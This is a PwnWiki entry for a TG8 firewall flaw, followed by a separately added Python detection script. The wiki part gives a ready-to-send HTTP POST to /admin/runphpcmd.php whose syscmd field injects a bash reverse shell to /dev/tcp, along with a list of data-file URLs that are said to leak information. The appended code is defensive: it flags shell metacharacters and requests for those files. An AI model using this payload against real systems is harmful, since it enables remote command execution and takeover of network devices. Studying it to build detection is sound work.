TG8 Firewall RCE & Information Disclosure Vulnerability

From PwnWiki
Revision as of 09:35, 17 May 2021 by Pwnwiki

Payload

POST /admin/runphpcmd.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: keep-alive

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bbash%2F-i%2F>&%2F/dev/tcp/127.0.0.1/10086%2F0>&1%3B++local

Spaces are replaced with %2f, and ';' is replaced with %3B.

Information Disclosure

http://127.0.0.1/data/w-341.tg
http://127.0.0.1/data/w-342.tg
http://127.0.0.1/data/r-341.tg
http://127.0.0.1/data/r-342.tg
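
Detection logic for the two request patterns shown on this page, added here as an example and not part of the original PwnWiki entry. The record layout (method, target, body), the names `classify_request` and `scan`, the finding labels and the generalised `/data/[rw]-<digits>.tg` pattern are assumptions; the sample requests are constructed, including the benign form of the `syscmd` value.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

CMD_ENDPOINT = "/admin/runphpcmd.php"  # endpoint from the request on this page
# Assumption: generalises the four /data/*.tg URLs listed on this page.
DATA_FILE_RE = re.compile(r"^/data/[rw]-\d+\.tg$")
# Characters and redirection targets that let a syscmd value run a second command.
SHELL_META_RE = re.compile(r"[;|&`$<>\r\n]|/dev/(?:tcp|udp)/")


def classify_request(method, target, body=""):
    """Return a list of finding labels for one HTTP request (empty if clean)."""
    findings = []
    path = unquote(urlsplit(target).path)
    if method.upper() == "POST" and path == CMD_ENDPOINT:
        # parse_qs URL-decodes values, so %3B and '+' are seen as ';' and ' '.
        for value in parse_qs(body, keep_blank_values=True).get("syscmd", []):
            if SHELL_META_RE.search(value):
                findings.append("syscmd-shell-metacharacter")
                break
    if method.upper() == "GET" and DATA_FILE_RE.match(path):
        findings.append("data-file-request")
    return findings


# Constructed sample records (method, target, body); not captured traffic.
SAMPLE_REQUESTS = [
    ("POST", "/admin/runphpcmd.php",
     "syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+user1+local"),
    ("POST", "/admin/runphpcmd.php",
     "syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bid%3B++local"),
    ("GET", "/data/w-341.tg", ""),
    ("GET", "/data/readme.txt", ""),
]


def scan(requests):
    """Return (target, findings) for every request with at least one finding."""
    hits = []
    for method, target, body in requests:
        findings = classify_request(method, target, body)
        if findings:
            hits.append((target, findings))
    return hits


if __name__ == "__main__":
    for target, findings in scan(SAMPLE_REQUESTS):
        print(target, findings)
```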